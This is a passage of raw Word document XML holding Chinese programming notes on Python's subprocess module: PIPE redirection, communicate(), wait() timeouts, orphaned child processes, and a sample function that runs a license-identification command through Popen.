            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A58A0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，文件描述符就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0,1,2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> stdin stdout stderr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的东西</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AE4661" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果都定向到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PIPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，意思就是，输出不是程序运行时即时输出，而是等到主程序运行结束一下子输出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CEC46B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我个人的理解啊，如果没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>子进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">.communicate(timeout=2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的话，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PIPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写和不写的作用如上。如果使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>communicate()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的话，就没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PIPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>什么事儿了，因为被接收了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6851F3CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>刚才试验了一下，可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>不太一样？我忘了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>是怎么回事儿了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B02920E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>子进程的文件描述符给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>PIPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的话，程序正常运行完，没有子进程的任何输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA9FEBA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>子进程的文件描述符不设置的话，程序运行不管有没有异常，子进程的输出是有的、</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409DDEAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>所以在设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>PIPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的情况下，你使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> .communicate() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>一下。这样可以看到输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03740956" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1596D919" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FFFF00"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFF00"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>此处详述一下多线程中的超时问题：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5713580A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>try except</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C256E2C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会抛出超市异常，而且会直接停止程序运行，如图，没有执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后语句，直接跳到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>except</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63004F18" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5C58FFC0" wp14:editId="5D584403">
            <wp:extent cx="3275965" cy="1876425"/>
            <wp:effectExtent l="0" t="0" r="635" b="1333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151"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3275965" cy="1876425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE74601" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果没使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> try except</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C75589F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主程序会运行后面的代码直至结束，子进程会成为孤儿进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD5B7CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1E360A13" wp14:editId="1A2D2C5C">
            <wp:extent cx="2639060" cy="1744980"/>
            <wp:effectExtent l="0" t="0" r="12700" b="762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152"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2639060" cy="1744980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF95731" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应该还是不太一样，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中估计不运行了，这点还没有探究。但是建议进程中加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> try except</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句控制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2192C839" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1717E8E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4DE618" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">            scanSecretExec.wait(60*4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4680DED7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">            # outs, errs = scanSecretExec.communicate(timeout=2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F1B9D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">            # print(outs, errs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C726D5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">        except Exception as err:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD9FB26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">            print("[!]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>超时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> "+str(err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3184B866" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA2E17E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">            scanSecretExec.kill()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B180B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EA362BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D0FD556" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73781490" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>import shlex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B9CDB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53162452" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def identify_license(golang_mod):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137C5022" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "return (None, None) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回值是一个元组，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Eg: ('0', outs+errs)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231AE2DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    mod_list = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597E5988" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    for charactor in unquote(golang_mod).lower():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3D8C0C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        mod_list.append('*')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573299CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        mod_list.append(charactor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B432776" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    mod_path = "{GOPATH}{GOLANG_MOD}/".format(GOPATH=GOPATH, GOLANG_MOD=''.join(mod_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4DB979" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    license_path = license_filename_detect(mod_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D14E78" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72BC2091" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if license_path == None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363A45C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return (None, None)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74929FF4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="380F3F3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    golang_mod_download_command = "{identify_license_PATH} {LICENSE_PATH}".format(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF9DAB5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        identify_license_PATH=identify_license_PATH, LICENSE_PATH=license_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B481988" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18087710" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>golang_mod_download_process= subprocess.Popen(golang_mod_download_command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CC4FA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>golang_mod_download_process.wait(15)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14183493" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>允许程序运行时间，超过该秒数认为超时</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA5B7C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FFFF00"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFF00"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFF00"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>失误：此处没有</w:t>
      </w:r>
      <w:r>
